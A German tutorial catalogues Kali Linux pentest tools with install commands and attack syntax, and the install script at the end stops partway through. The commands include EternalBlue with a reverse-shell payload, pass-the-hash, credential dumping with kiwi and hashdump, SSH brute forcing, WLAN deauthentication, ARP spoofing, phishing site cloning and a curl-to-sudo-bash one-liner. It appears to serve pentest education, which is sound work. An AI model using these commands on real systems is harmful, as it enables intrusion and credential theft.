Kali Linux Pentest Tools – Vollständige Anleitung
Diese Anleitung deckt alle wichtigen Penetration-Testing-Tools auf Kali Linux ab – kategorisiert nach Einsatzbereich, mit Installationsbefehl, Basis-Syntax und typischen Anwendungsfällen. Am Ende befindet sich ein vollständiges Installations-Script, das alle Tools in einem Befehl einrichtet.
⚠️ Rechtlicher Hinweis
Alle hier beschriebenen Tools dürfen ausschließlich auf eigenen Systemen oder mit expliziter schriftlicher Genehmigung des Eigentümers eingesetzt werden. Unbefugtes Eindringen in fremde Systeme ist in Deutschland gemäß § 202a / 202b / 202c StGB strafbar und kann mit bis zu 3 Jahren Freiheitsstrafe bestraft werden. Übe in isolierten Lab-Umgebungen wie TryHackMe, Hack The Box oder mit lokalen VMs (Metasploitable, DVWA).
Inhaltsverzeichnis
- Reconnaissance & Information Gathering
- Netzwerk-Scanning & Enumeration
- Web Application Testing
- Fuzzing & Directory Bruteforce
- Exploitation Frameworks
- Passwort-Angriffe & Cracking
- Wireless & WLAN-Angriffe
- Sniffing & Traffic-Analyse
- Post-Exploitation
- Forensics & Reverse Engineering
- Social Engineering
- Alles-in-einem Installations-Script
1. Reconnaissance & Information Gathering
Die erste Phase jedes Pentests: so viele Informationen wie möglich über das Ziel sammeln, bevor aktiv gescannt oder angegriffen wird.
theHarvester
| Eigenschaft |
Details |
| Einsatz |
E-Mail-Adressen, Subdomains, IPs, URLs aus öffentlichen Quellen sammeln |
| Quellen |
Google, Bing, LinkedIn, Shodan, Hunter.io, VirusTotal u.v.m. |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y theharvester
# E-Mails und Subdomains für eine Domain sammeln
theHarvester -d beispiel.de -b google,bing,linkedin -l 500
# Alle verfügbaren Quellen nutzen
theHarvester -d beispiel.de -b all
Maltego
| Eigenschaft |
Details |
| Einsatz |
Grafische OSINT-Analyse – Beziehungen zwischen Personen, Domains, IPs, Firmen |
| Besonderheit |
GUI-Tool mit Transform-System; Community-Version kostenlos |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y maltego
maltego # startet die GUI
Recon-ng
| Eigenschaft |
Details |
| Einsatz |
Modulares OSINT-Framework (ähnlich wie Metasploit für Recon) |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y recon-ng
recon-ng
# In der Konsole:
[recon-ng] > marketplace search domains
[recon-ng] > modules load recon/domains-hosts/hackertarget
[recon-ng] > options set SOURCE beispiel.de
[recon-ng] > run
Shodan CLI
| Eigenschaft |
Details |
| Einsatz |
Suche nach öffentlich erreichbaren Geräten, offenen Ports, Banner-Infos |
| Hinweis |
API-Key von shodan.io erforderlich (kostenloser Plan verfügbar) |
sudo pip3 install shodan
shodan init DEIN_API_KEY
# Nach verwundbaren Diensten suchen
shodan search apache 2.2
shodan host 1.2.3.4
DNSrecon
| Eigenschaft |
Details |
| Einsatz |
DNS-Enumeration: Zone Transfer, Brute-Force, Reverse Lookup |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y dnsrecon
# Standard-Scan
dnsrecon -d beispiel.de
# Zone Transfer versuchen
dnsrecon -d beispiel.de -t axfr
# DNS-Brute-Force
dnsrecon -d beispiel.de -t brt -D /usr/share/wordlists/dnsmap.txt
Sublist3r
| Eigenschaft |
Details |
| Einsatz |
Subdomains über OSINT-Quellen (Google, Bing, Virustotal, Netcraft) finden |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y sublist3r
sublist3r -d beispiel.de
sublist3r -d beispiel.de -o subdomains.txt # Output in Datei
Amass
| Eigenschaft |
Details |
| Einsatz |
Umfassende Attack-Surface-Erkennung; Subdomains, ASNs, IP-Ranges |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y amass
amass enum -d beispiel.de
amass enum -d beispiel.de -o ergebnis.txt
amass intel -d beispiel.de # OSINT-Modus
2. Netzwerk-Scanning & Enumeration
Nmap
| Eigenschaft |
Details |
| Einsatz |
Der Standard für Netzwerk-Scanning: Ports, Services, OS-Erkennung, Scripts |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y nmap
# Schneller Scan (Top 1000 Ports)
nmap -T4 -F 192.168.1.1
# Vollständiger Scan mit Service- und OS-Erkennung
nmap -T4 -A -v 192.168.1.0/24
# Stealth SYN-Scan + Versionserkennung
sudo nmap -sS -sV -p- 192.168.1.1
# Vulnerability-Scan mit NSE-Scripts
nmap --script vuln 192.168.1.1
# Alle offenen Ports speichern
nmap -p- -oN ergebnis.txt 192.168.1.1
Nmap Spickzettel
-sS = SYN-Scan (Stealth) | -sV = Versionserkennung | -O = OS-Erkennung | -A = Alles | -p- = Alle 65535 Ports | -T4 = Schnell | -oN = Output als Text
Masscan
| Eigenschaft |
Details |
| Einsatz |
Extrem schneller Port-Scanner – scannt das gesamte Internet in Minuten |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y masscan
# Schneller Scan eines Subnetzes
sudo masscan 192.168.1.0/24 -p80,443,22,21 --rate=1000
# Alle Ports scannen
sudo masscan 192.168.1.1 -p0-65535 --rate=10000
Netdiscover
| Eigenschaft |
Details |
| Einsatz |
Aktive/Passive Hosts im lokalen Netz per ARP entdecken |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y netdiscover
sudo netdiscover -r 192.168.1.0/24
sudo netdiscover -i eth0 -p # Passiver Modus (kein Traffic erzeugt)
Enum4linux
| Eigenschaft |
Details |
| Einsatz |
SMB/Samba-Enumeration: Benutzer, Gruppen, Shares auf Windows/Linux |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y enum4linux
enum4linux -a 192.168.1.10 # Vollständige Enumeration
enum4linux -U 192.168.1.10 # Nur Benutzer
enum4linux -S 192.168.1.10 # Nur Shares
Impacket
| Eigenschaft |
Details |
| Einsatz |
Python-Toolset für Windows-Protokolle: SMB, MSRPC, NTLM, Kerberos |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y impacket-scripts
# Passwort-Hashes aus SAM-Datenbank dumpen
impacket-secretsdump administrator:passwort@192.168.1.10
# Pass-the-Hash Angriff
impacket-psexec -hashes :NTLM-HASH administrator@192.168.1.10
# Kerberoasting
impacket-GetUserSPNs domain.local/benutzer:passwort -dc-ip 192.168.1.10 -request
3. Web Application Testing
Nikto
| Eigenschaft |
Details |
| Einsatz |
Webserver auf 6.700+ bekannte Schwachstellen, Fehlkonfigurationen und veraltete Software prüfen |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y nikto
nikto -h https://zielseite.de
nikto -h https://zielseite.de -o ergebnis.html -Format html
nikto -h https://zielseite.de -ssl -Tuning 1234
SQLmap
| Eigenschaft |
Details |
| Einsatz |
Automatisches Erkennen und Ausnutzen von SQL-Injection-Schwachstellen |
| Datenbanken |
MySQL, PostgreSQL, MSSQL, Oracle, SQLite und mehr |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y sqlmap
# Grundlegender Test
sqlmap -u "https://seite.de/page?id=1"
# Datenbanken auflisten
sqlmap -u "https://seite.de/page?id=1" --dbs
# Tabellen einer Datenbank auflisten
sqlmap -u "https://seite.de/page?id=1" -D datenbankname --tables
# Daten aus Tabelle dumpen
sqlmap -u "https://seite.de/page?id=1" -D datenbankname -T tabellenname --dump
# POST-Request testen
sqlmap -u "https://seite.de/login" --data="user=admin&pass=test" --dbs
# Mit Burp-Request-Datei
sqlmap -r request.txt --dbs --level=5 --risk=3
WPScan
| Eigenschaft |
Details |
| Einsatz |
WordPress-Scanner: Plugins, Themes, CVEs, Benutzernamen |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y wpscan
wpscan --url https://wordpress-seite.de
wpscan --url https://wordpress-seite.de --enumerate u # Benutzernamen
wpscan --url https://wordpress-seite.de --enumerate p # Plugins
wpscan --url https://wordpress-seite.de --enumerate vp # Nur vulnerable Plugins
wpscan --url https://wordpress-seite.de --api-token TOKEN # Mit API-Key für CVE-Daten
wpscan --url https://wordpress-seite.de -P /usr/share/wordlists/rockyou.txt -U admin # Passwort-Brute
OWASP ZAP
| Eigenschaft |
Details |
| Einsatz |
Interaktives Web-Proxying, automatische Scans, Spider, Active/Passive Scanner |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y zaproxy
# GUI starten
zaproxy
# Headless Spider + Active Scan (CLI)
zaproxy -cmd -quickurl https://zielseite.de -quickout ergebnis.html
Burp Suite (Community)
| Eigenschaft |
Details |
| Einsatz |
HTTP-Proxy, Spider, Scanner, Intruder, Repeater – Industriestandard für Web-Pentesting |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y burpsuite
burpsuite # startet die GUI
Burp Suite Setup
Proxy läuft standardmäßig auf 127.0.0.1:8080. Browser-Proxy auf diesen Port setzen und das Burp CA-Zertifikat unter Proxy → Options → CA Certificate installieren, um HTTPS-Traffic abzufangen.
Skipfish
| Eigenschaft |
Details |
| Einsatz |
Aggressiver Web-Application-Scanner mit Sitemap-Erstellung |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y skipfish
skipfish -o ergebnis_ordner https://zielseite.de
Nuclei
| Eigenschaft |
Details |
| Einsatz |
Template-basierter Scanner für bekannte CVEs und Fehlkonfigurationen |
| Vorinstalliert |
✅ Ja (Kali, seit 2023) |
sudo apt install -y nuclei
nuclei -u https://zielseite.de
nuclei -u https://zielseite.de -t cves/
nuclei -l urls.txt -severity high,critical
nuclei -update-templates # Templates aktualisieren
4. Fuzzing & Directory Bruteforce
Gobuster
| Eigenschaft |
Details |
| Einsatz |
Verzeichnisse, Dateien, vHosts, DNS-Subdomains per Brute-Force finden |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y gobuster
# Verzeichnis-Scan
gobuster dir -u https://zielseite.de -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Dateiendungen einschließen
gobuster dir -u https://zielseite.de -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak
# DNS-Subdomain-Scan
gobuster dns -d beispiel.de -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# vHost-Scan
gobuster vhost -u https://zielseite.de -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
ffuf (Fuzz Faster U Fool)
| Eigenschaft |
Details |
| Einsatz |
Extrem schnelles Web-Fuzzing: URLs, Parameter, Header, POST-Daten |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y ffuf
# Verzeichnisse finden
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u https://zielseite.de/FUZZ
# Parameter fuzzen
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "https://zielseite.de/page?FUZZ=wert"
# POST-Daten fuzzen (z.B. Login)
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin&password=FUZZ" -u https://zielseite.de/login -fc 302
# Bestimmte Statuscodes filtern
ffuf -w wordlist.txt -u https://zielseite.de/FUZZ -fc 404 -mc 200,301,302
Dirsearch
| Eigenschaft |
Details |
| Einsatz |
Versteckte Verzeichnisse und Dateien finden – einfache Bedienung |
| Vorinstalliert |
✅ Ja (Kali, neuere Versionen) |
sudo apt install -y dirsearch
dirsearch -u https://zielseite.de
dirsearch -u https://zielseite.de -e php,html,txt,bak,env
dirsearch -u https://zielseite.de -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
Dirb
| Eigenschaft |
Details |
| Einsatz |
Klassischer Web-Content-Scanner mit eingebauten Wortlisten |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y dirb
dirb https://zielseite.de
dirb https://zielseite.de /usr/share/wordlists/dirb/big.txt
Wfuzz
| Eigenschaft |
Details |
| Einsatz |
Flexibles Web-Fuzzing-Framework: URLs, Header, Cookies, POST-Daten |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y wfuzz
# Verzeichnisse
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 https://zielseite.de/FUZZ
# Parameter fuzzen
wfuzz -c -z file,/usr/share/wordlists/rockyou.txt -d "user=admin&pass=FUZZ" https://zielseite.de/login
5. Exploitation Frameworks
| Eigenschaft |
Details |
| Einsatz |
Das mächtigste Exploitation-Framework: 2.300+ Exploits, Payloads, Post-Exploitation |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y metasploit-framework
# PostgreSQL starten (für Workspace/Datenbank)
sudo systemctl start postgresql
sudo msfdb init
# Metasploit starten
msfconsole
# Innerhalb von msfconsole:
msf6 > search eternalblue # Exploits suchen
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > show options # Parameter anzeigen
msf6 exploit > set RHOSTS 192.168.1.10
msf6 exploit > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit > set LHOST 192.168.1.100
msf6 exploit > run
# Nmap-Scan direkt aus Metasploit
msf6 > db_nmap -sV 192.168.1.0/24
Metasploit Datenbank
Vor dem ersten Start sudo msfdb init ausführen. Mit workspace -a meinprojekt können separate Workspaces für unterschiedliche Tests angelegt werden.
BeEF (Browser Exploitation Framework)
| Eigenschaft |
Details |
| Einsatz |
Browser-Hacking über XSS-Hooks: Client-side-Angriffe demonstrieren |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y beef-xss
sudo beef-xss # startet den Server
# Web-Interface: http://127.0.0.1:3000/ui/panel
# Standard-Login: beef / beef
SearchSploit / Exploit-DB
| Eigenschaft |
Details |
| Einsatz |
Lokale Suche in der Exploit-DB – offline verfügbar |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y exploitdb
searchsploit apache 2.4
searchsploit -m 12345 # Exploit herunterladen (nach ID)
searchsploit --update # Datenbank aktualisieren
6. Passwort-Angriffe & Cracking
Hydra
| Eigenschaft |
Details |
| Einsatz |
Online-Brute-Force für SSH, FTP, HTTP, SMB, RDP, Telnet, SMTP u.v.m. |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y hydra
# SSH Brute-Force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# HTTP Login-Form
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Falsche Zugangsdaten"
# FTP mit Benutzerliste
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10
# Mehrere Threads (-t) und Protokoll explizit
hydra -l admin -P passwortliste.txt -t 64 192.168.1.10 http-get /admin
John the Ripper
| Eigenschaft |
Details |
| Einsatz |
Offline-Hash-Cracking: MD5, SHA, NTLM, bcrypt, ZIP, PDF, SSH-Keys |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y john
# Hash cracken mit Standard-Wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Hash-Typ manuell angeben
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIP-Datei cracken
zip2john archiv.zip > zip_hash.txt
john zip_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# SSH-Key cracken
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Bereits gecrackte Passwörter anzeigen
john --show hashes.txt
Hashcat
| Eigenschaft |
Details |
| Einsatz |
GPU-beschleunigtes Hash-Cracking – extrem schnell für NTLM, SHA256, bcrypt |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y hashcat
# MD5-Hashes mit Wordlist cracken (-m 0 = MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
# NTLM-Hashes (-m 1000 = NTLM)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Brute-Force mit Maske (8 Zeichen, Zahlen+Buchstaben)
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a?a?a
# bcrypt (-m 3200)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --force
Hashcat Hash-Typen (Auswahl)
-m 0 = MD5 | -m 100 = SHA1 | -m 1000 = NTLM | -m 1800 = SHA-512 (Linux) | -m 3200 = bcrypt | -m 5600 = NetNTLMv2 | -m 22000 = WPA2
Medusa
| Eigenschaft |
Details |
| Einsatz |
Paralleler Online-Brute-Forcer – Alternative zu Hydra |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y medusa
medusa -h 192.168.1.10 -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwortliste.txt -M ftp
CeWL
| Eigenschaft |
Details |
| Einsatz |
Custom Wordlist Generator – crawlt eine Website und erstellt zielspezifische Wortlisten |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y cewl
cewl https://zielseite.de -d 2 -m 8 -o wordlist.txt
# -d = Tiefe | -m = Mindestlänge | -o = Ausgabedatei
Crunch
| Eigenschaft |
Details |
| Einsatz |
Custom Wordlist nach Muster generieren (Kombinationen, Länge, Zeichensatz) |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y crunch
# 8-stellige Wortliste (a-z)
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# Mit Muster: Wort + 4 Ziffern
crunch 9 9 -t passwort%%%% -o wordlist.txt
7. Wireless & WLAN-Angriffe
Aircrack-ng Suite
| Eigenschaft |
Details |
| Einsatz |
WLAN-Sicherheitstest: WEP/WPA2 cracken, Deauth, Packet Injection |
| Enthält |
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y aircrack-ng
# 1. Monitor-Modus aktivieren
sudo airmon-ng start wlan0
# 2. Netzwerke scannen
sudo airodump-ng wlan0mon
# 3. Spezifisches Netzwerk mitschneiden (BSSID + Channel angeben)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# 4. Deauthentication-Angriff (Client trennen, Handshake erzwingen)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# 5. WPA2-Handshake cracken
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake.cap
# Monitor-Modus beenden
sudo airmon-ng stop wlan0mon
Wifite
| Eigenschaft |
Details |
| Einsatz |
Automatisierter WLAN-Angriff – nutzt Aircrack-ng im Hintergrund |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y wifite
sudo wifite
sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Kismet
| Eigenschaft |
Details |
| Einsatz |
Wireless-Sniffer und IDS: WLAN, Bluetooth, Zigbee erkennen und loggen |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y kismet
sudo kismet -c wlan0
# Web-Interface: http://localhost:2501
Reaver
| Eigenschaft |
Details |
| Einsatz |
WPS-PIN Brute-Force – greift Router mit aktiviertem WPS an |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
8. Sniffing & Traffic-Analyse
Wireshark
| Eigenschaft |
Details |
| Einsatz |
Grafischer Netzwerk-Protokoll-Analyzer – der Standard für Packet-Capturing |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y wireshark
wireshark # GUI starten
# Kommandozeile (tshark)
sudo tshark -i eth0 -w capture.pcap
sudo tshark -r capture.pcap -Y "http.request" # HTTP-Requests filtern
sudo tshark -r capture.pcap -Y "ftp" -T fields -e ftp.request.arg # FTP-Passwörter
Tcpdump
| Eigenschaft |
Details |
| Einsatz |
Kommandozeilen-Packet-Capture – leichtgewichtig, auf jedem System verfügbar |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y tcpdump
sudo tcpdump -i eth0 # Alle Pakete auf eth0
sudo tcpdump -i eth0 -w capture.pcap # In Datei schreiben
sudo tcpdump -i eth0 port 80 # Nur HTTP
sudo tcpdump -i eth0 host 192.168.1.10 # Nur bestimmte IP
sudo tcpdump -r capture.pcap -n # Datei lesen
Bettercap
| Eigenschaft |
Details |
| Einsatz |
Man-in-the-Middle-Framework: ARP-Spoofing, DNS-Spoofing, HTTP/HTTPS-Sniffing |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y bettercap
sudo bettercap -iface eth0
# In der Bettercap-Konsole:
> net.probe on # Hosts im Netz entdecken
> net.show # Gefundene Hosts anzeigen
> set arp.spoof.targets 192.168.1.10
> arp.spoof on # ARP-Spoofing starten (MITM)
> net.sniff on # Traffic mitsniffen
Ettercap
| Eigenschaft |
Details |
| Einsatz |
Klassisches MITM-Tool mit GUI: ARP-Poisoning, SSL-Stripping, Passwort-Sniffing |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y ettercap-graphical
sudo ettercap -G # GUI
# oder
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.1// /192.168.1.10//
9. Post-Exploitation
Nach erfolgreicher Exploitation automatisch verfügbar über Metasploit. Ermöglicht Dateioperationen, Keylogging, Screenshot, Privilege Escalation.
# Nach erfolgreicher Shell in msfconsole:
meterpreter > sysinfo # Systeminformationen
meterpreter > getuid # Aktueller Benutzer
meterpreter > getsystem # Privilege Escalation versuchen
meterpreter > hashdump # Password-Hashes dumpen
meterpreter > screenshot # Desktop-Screenshot
meterpreter > keyscan_start # Keylogger starten
meterpreter > download /etc/passwd # Datei herunterladen
meterpreter > upload shell.php /var/www/html/ # Datei hochladen
BloodHound
| Eigenschaft |
Details |
| Einsatz |
Active Directory Attack Path Mapping – Grafische Darstellung von Angriffspfaden |
| Vorinstalliert |
✅ Ja (Kali, seit 2025) |
sudo apt install -y bloodhound
# Neo4j-Datenbank starten
sudo neo4j console &
bloodhound # GUI starten
# Login: neo4j / neo4j (beim ersten Start Passwort ändern)
# Daten mit SharpHound sammeln (auf Windows-Zielsystem)
# SharpHound.exe -c All
# Resultierende ZIP in BloodHound GUI importieren
LinPEAS / WinPEAS (PEASS-ng)
| Eigenschaft |
Details |
| Einsatz |
Automatische Privilege-Escalation-Suche auf Linux und Windows |
# Herunterladen
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Auf Zielsystem übertragen (per Meterpreter oder wget)
# Ergebnis nach SUID, cron jobs, schwachen Berechtigungen durchsuchen
Passwort-Hashes und Klartext-Passwörter aus dem Windows-Speicher extrahieren.
# In Meterpreter (Windows-Ziel):
meterpreter > load kiwi
meterpreter > creds_all # Alle Credentials dumpen
meterpreter > lsa_dump_sam # SAM-Datenbank dumpen
meterpreter > lsa_dump_secrets # LSA Secrets dumpen
10. Forensics & Reverse Engineering
Volatility
| Eigenschaft |
Details |
| Einsatz |
Memory-Forensik: RAM-Dumps analysieren, Prozesse, Netzwerkverbindungen, Malware finden |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y volatility3
# Prozessliste aus RAM-Dump
vol -f memory.dmp windows.pslist
# Netzwerkverbindungen
vol -f memory.dmp windows.netstat
# Injected Code finden
vol -f memory.dmp windows.malfind
Binwalk
| Eigenschaft |
Details |
| Einsatz |
Firmware-Analyse: Versteckte Dateien in Binärdateien/Images finden und extrahieren |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y binwalk
binwalk firmware.bin # Analysieren
binwalk -e firmware.bin # Extrahieren
Ghidra
| Eigenschaft |
Details |
| Einsatz |
NSA-Reverse-Engineering-Framework: Disassembler, Decompiler für alle Architekturen |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y ghidra
ghidra # GUI starten
Radare2
| Eigenschaft |
Details |
| Einsatz |
Kommandozeilen-Disassembler und Debugger – extrem mächtig für Binär-Analyse |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y radare2
r2 binary # Datei öffnen
[0x00000000]> aaa # Analyse
[0x00000000]> afl # Alle Funktionen auflisten
[0x00000000]> pdf @ main # Funktion disassemblieren
Foremost
| Eigenschaft |
Details |
| Einsatz |
File-Carving: Gelöschte Dateien aus Disk-Images wiederherstellen |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y foremost
foremost -i disk.img -o wiederhergestellt/
foremost -t jpg,png,pdf -i disk.img -o output/
11. Social Engineering
Social Engineering Toolkit (SET)
| Eigenschaft |
Details |
| Einsatz |
Phishing-Seiten klonen, Spear-Phishing-E-Mails, credential harvesting |
| Vorinstalliert |
✅ Ja (Kali) |
sudo apt install -y set
sudo setoolkit
# Menüpunkte: 1 = Social-Engineering Attacks
# 2 = Website Attack Vectors
# 3 = Credential Harvester Attack Method
# 2 = Site Cloner → URL eingeben → Phishing-Seite wird lokal gehostet
Gophish
| Eigenschaft |
Details |
| Einsatz |
Open-Source Phishing-Simulation Framework mit Web-Dashboard |
| Vorinstalliert |
✅ Ja (Kali, seit 2025.3) |
sudo apt install -y gophish
gophish
# Web-Dashboard: https://127.0.0.1:3333
# Standard-Login: admin (Passwort beim ersten Start im Terminal ausgegeben)
12. Alles-in-einem Installations-Script
Dieses Script installiert alle oben genannten Tools in einem einzigen Befehl auf Kali Linux (oder Debian/Ubuntu). Es prüft, ob Tools bereits installiert sind, loggt den Fortschritt und gibt am Ende eine Übersicht aus.
Voraussetzungen
Kali Linux (empfohlen) oder Debian/Ubuntu | Sudo-Rechte erforderlich | Aktive Internetverbindung | Mindestens 10 GB freier Speicher empfohlen
Script herunterladen und ausführen
# Script herunterladen und direkt ausführen (Einzeiler)
curl -s https://raw.githubusercontent.com/... | sudo bash
# ODER: Script erstellen und manuell ausführen
nano kali_pentest_install.sh # Inhalt einfügen
chmod +x kali_pentest_install.sh
sudo ./kali_pentest_install.sh
Script-Inhalt
#!/usr/bin/env bash
# =============================================================================
# Kali Linux Pentest Tools – Master-Installations-Script
# Nyrux / Leon | github.com/nyrux
# Nutzung: sudo ./kali_pentest_install.sh
# =============================================================================
set -euo pipefail
# Farben
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
BOLD='\033[1m'
NC='\033[0m'
LOG_FILE="/var/log/pentest_install_$(date +%Y%m%d_%H%M%S).log"
FAILED_TOOLS=()
SUCCESS_COUNT=0
# Root-Check
if [[ $EUID -ne 0 ]]; then
echo -e "${RED}[FEHLER]${NC} Bitte als root oder mit sudo ausführen."
exit 1
fi
log() { echo -e "$1" | tee -a "$LOG_FILE"; }
info() { log "${CYAN}[INFO]${NC} $1"; }
success() { log "${GREEN}[OK]${NC} $1"; ((SUCCESS_COUNT++)); }
warn() { log "${YELLOW}[WARN]${NC} $1"; }
error() { log "${RED}[FEHLER]${NC} $1"; }
banner() {
echo -e "${BOLD}${CYAN}"
echo "╔══════════════════════════════════════════════════════════╗"
echo "║ Kali Linux Pentest Tools – Installer ║"
echo "║ Nyrux | github.com/nyrux ║"
echo "╚══════════════════════════════════════════════════════════╝"
echo -e "${NC}"
}
# APT-Pakete installieren (mit Fehlerbehandlung)
install_apt() {
local package="$1"
if dpkg -s "$package" &>/dev/null; then
warn "$package bereits installiert – übersprungen."
((SUCCESS_COUNT++))
return 0
fi
info "Installiere: $package"
if apt-get install -y "$package" >> "$LOG_FILE" 2>&1; then
success "$package erfolgreich installiert."
else
error "$package konnte nicht installiert werden."
FAILED_TOOLS+=("$package")
fi
}
# Abschnitt-Header
section() {
echo ""
log "${BOLD}${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
log "${BOLD}${CYAN} $1${NC}"
log "${BOLD}${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
}
# =============================================================================
banner
log "Logfile: $LOG_FILE"
log "Start: $(date)"
# System aktualisieren
section "System aktualisieren"
info "apt-get update && apt-get upgrade..."
apt-get update -qq >> "$LOG_FILE" 2>&1
apt-get upgrade -y -qq >> "$LOG_FILE" 2>&1
success "System aktualisiert."
# =============================================================================
section "Basis-Abhängigkeiten"
BASE_DEPS=(
git curl wget python3 python3-pip python3-venv
build-essential libssl-dev libffi-dev
ruby ruby-dev gem
golang-go
apt-transport-https ca-certificates gnupg
net-tools dnsutils whois traceroute
)
for pkg in "${BASE_DEPS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Reconnaissance & OSINT"
RECON_TOOLS=(
theharvester
maltego
recon-ng
sublist3r
amass
dnsrecon
dnsenum
dmitry
whatweb
)
for pkg in "${RECON_TOOLS[@]}"; do install_apt "$pkg"; done
# Shodan CLI (pip)
info "Installiere Shodan CLI (pip)..."
pip3 install --quiet shodan >> "$LOG_FILE" 2>&1 && success "shodan (pip) installiert." || { error "shodan (pip) fehlgeschlagen."; FAILED_TOOLS+=("shodan-pip"); }
# =============================================================================
section "Netzwerk-Scanning & Enumeration"
NET_TOOLS=(
nmap
masscan
netdiscover
arp-scan
hping3
enum4linux
impacket-scripts
nbtscan
onesixtyone
snmpwalk
)
for pkg in "${NET_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Web Application Testing"
WEB_TOOLS=(
nikto
sqlmap
wpscan
zaproxy
burpsuite
skipfish
nuclei
whatweb
wapiti
)
for pkg in "${WEB_TOOLS[@]}"; do install_apt "$pkg"; done
# =============================================================================
section "Fuzzing & Directory Bruteforce"
FUZZ_TOOLS=(
gobuster
ffuf
dirsearch
dirb
wfuzz
feroxbuster
)
for pkg in "${FUZZ_TOOLS[@]}"; do install_apt "$pkg"; done
# SecLists Wortlisten
if [[ ! -d "/usr/share/seclists" ]]; then
info "Installiere SecLists Wortlisten..."
install_apt seclists
else
warn "SecLists bereits vorhanden – übersprungen."
((SUCCESS_COUNT++))
fi
# =============================================================================
